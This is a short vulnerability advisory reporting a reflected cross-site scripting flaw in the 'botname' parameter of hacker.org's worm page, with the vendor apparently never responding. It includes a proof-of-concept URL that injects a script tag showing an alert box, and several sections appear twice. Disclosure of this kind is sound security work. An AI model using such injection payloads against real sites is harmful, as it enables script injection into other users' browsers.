SSCHADV2011-043 - hacker.org Cross-site Scripting vulnerability
Advisory:
|
hacker.org Cross-site Scripting vulnerability
|
Advisory ID: |
SSCHADV2011-043
|
Author: |
Stefan Schurtz
|
Affected Software: |
Successfully tested on hacker.org
|
Vendor URL: | http://hacker.org |
Vendor Status: |
informed
|
|
======================
Vulnerability Description:
======================
Vulnerability Description:
======================
hacker.org is prone to a XSS vulnerability
==============
PoC-Exploit
==============
// XSS
http://www.hacker.org/worm/index.php?botname=’"</script><script>alert(‘XSS’)</script>
=====
Solution
=====
-
================
Disclosure Timeline
================
11-Nov-2011 – admin informed (adam@adum.com)
14-Jan-2012 – no response
PoC-Exploit
==============
// XSS
http://www.hacker.org/worm/index.php?botname=’"</script><script>alert(‘XSS’)</script>
=====
Solution
=====
-
================
Disclosure Timeline
================
11-Nov-2011 – admin informed (adam@adum.com)
14-Jan-2012 – no response
====
Credits
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References
=======
http://www.darksecurity.de/advisories/SSCHADV2011-043.txt
Comments
Display comments as Linear | Threaded